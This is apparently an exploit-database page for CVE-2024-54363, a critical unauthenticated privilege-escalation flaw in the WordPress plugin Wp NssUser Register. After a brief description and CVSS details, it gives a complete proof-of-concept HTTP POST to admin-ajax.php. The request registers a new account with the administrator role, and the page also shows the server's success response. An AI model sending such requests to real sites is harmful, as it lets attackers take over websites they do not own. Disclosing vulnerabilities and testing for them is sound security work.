Share
## https://sploitus.com/exploit?id=1337DAY-ID-39847
# CVE-2024-54363
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation

# Description

The Wp NssUser Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to register on the site as administrators.

## Details

- **Type**: plugin
- **Slug**: wp-nssuser-register
- **Affected Version**: 1.0.0
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54363
- **Status**: Closed

POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/

action=nssTheme_registration_form&rgName=admin2&[email protected]&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
```

```
<p>successful, just Check this: </p>            <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>
        
```